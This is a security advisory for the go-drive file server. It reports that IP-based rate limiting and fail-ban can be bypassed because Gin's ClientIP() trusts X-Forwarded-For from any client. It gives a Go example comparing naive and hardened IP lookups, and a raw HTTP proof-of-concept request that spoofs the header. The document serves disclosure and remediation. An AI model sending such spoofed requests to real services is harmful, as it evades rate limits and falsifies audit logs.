Test Environment
The latest Docker image was used for testing:
docker run -d --name go-drive -p 8089:8089 -v `pwd`/go-drive-data:/app/data devld/go-drive
Vulnerability Analysis
The vulnerability is located in the LimiterByIP function, at the call to ctx.ClientIP(), which obtains the client IP address directly:
https://github.com/devld/go-drive/blob/40f2f782463367d27e7b5dbf4d85b5cdd235f137/server/fail_ban.go#L26C13-L26C21
According to the official Gin documentation, trusted proxies must be configured correctly; otherwise ClientIP() is vulnerable to IP spoofing: https://pkg.go.dev/github.com/gin-gonic/gin#section-readme
It is recommended to explicitly configure trusted proxies in the code to prevent this issue; see the official documentation: https://gin-gonic.com/en/docs/deployment/
router := gin.Default()
router.SetTrustedProxies([]string{"192.168.1.1/24"})
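The following is an added example written for this report; it is neither go-drive's nor Gin's code. It shows, side by side, the naive client-IP lookup that honours X-Forwarded-For from any peer (the behaviour the PoC exploits) and a hardened lookup that only honours the header when the TCP peer falls inside a configured trusted-proxy network, walking the header right to left the way the Gin documentation describes. The function names, the trusted network 10.0.0.0/8 and the sample addresses are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"strings"
)

// naiveClientIP is the vulnerable pattern: the leftmost X-Forwarded-For
// value wins regardless of who sent it, so any direct client can set it.
func naiveClientIP(r *http.Request) string {
	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
		return strings.TrimSpace(strings.Split(xff, ",")[0])
	}
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		return r.RemoteAddr
	}
	return host
}

// trustedClientIP is the hardened pattern. trusted lists the proxy networks
// (assumed to come from configuration). If the TCP peer is not a trusted
// proxy, the header is ignored and the peer address is used. If it is,
// X-Forwarded-For is walked right to left and the first hop that is not
// itself a trusted proxy is the client; if every hop is trusted, the peer
// address is used as a fallback.
func trustedClientIP(r *http.Request, trusted []*net.IPNet) string {
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		host = r.RemoteAddr
	}
	peer := net.ParseIP(host)
	if peer == nil || !inNets(peer, trusted) {
		return host
	}
	parts := strings.Split(r.Header.Get("X-Forwarded-For"), ",")
	for i := len(parts) - 1; i >= 0; i-- {
		ip := net.ParseIP(strings.TrimSpace(parts[i]))
		if ip == nil {
			break // malformed or empty hop: trust nothing to its left
		}
		if !inNets(ip, trusted) {
			return ip.String()
		}
	}
	return host
}

func inNets(ip net.IP, nets []*net.IPNet) bool {
	for _, n := range nets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// mustParseCIDRs converts configured CIDR strings into networks and panics
// on a bad entry, so a misconfiguration fails at startup rather than silently
// widening or narrowing the trusted set.
func mustParseCIDRs(cidrs []string) []*net.IPNet {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			panic(fmt.Sprintf("bad trusted proxy %q: %v", c, err))
		}
		nets = append(nets, n)
	}
	return nets
}

// resolve builds a request from a constructed peer address and header value
// and returns (naive, hardened) so the two policies can be compared directly.
func resolve(remoteAddr, xff string, trustedCIDRs []string) (string, string) {
	r := &http.Request{RemoteAddr: remoteAddr, Header: http.Header{}}
	if xff != "" {
		r.Header.Set("X-Forwarded-For", xff)
	}
	return naiveClientIP(r), trustedClientIP(r, mustParseCIDRs(trustedCIDRs))
}

func main() {
	trusted := []string{"10.0.0.0/8"} // constructed: the reverse proxy's network
	cases := []struct{ peer, xff string }{
		{"203.0.113.7:5555", "8.8.8.8"},            // direct client sending the PoC header
		{"10.0.0.5:4321", "198.51.100.9, 10.0.0.5"}, // genuine client behind the trusted proxy
		{"10.0.0.5:4321", "8.8.8.8, 198.51.100.9"},  // client-supplied hop, proxy appended the real address
	}
	for _, c := range cases {
		naive, hardened := resolve(c.peer, c.xff, trusted)
		fmt.Printf("peer=%-18s xff=%-28q naive=%-14s hardened=%s\n", c.peer, c.xff, naive, hardened)
	}
}
```

For the first case the naive lookup reports 8.8.8.8, exactly what the PoC below achieves against go-drive, while the hardened lookup reports the real peer 203.0.113.7 and the fail-ban counter and audit log stay correct. With an empty trusted list the hardened lookup never consults the header at all, which is the safe default when the service is exposed without a reverse proxy.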
Proof of Concept (PoC)
By modifying the HTTP request and injecting an arbitrary X-Forwarded-For header, the client IP can be spoofed. In this example, the IP is set to 8.8.8.8:
POST /auth/init HTTP/1.1
Host: 127.0.0.1:8089
Content-Length: 0
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
X-Forwarded-For: 8.8.8.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Auditing the IP logs confirms that the IP address was successfully spoofed:
Impact
This issue allows complete bypass of IP-based logging and auditing. It also enables attackers to evade rate-limiting and other IP-based access control mechanisms, resulting in significant security risk.
Affected Versions
<= Release v0.11.7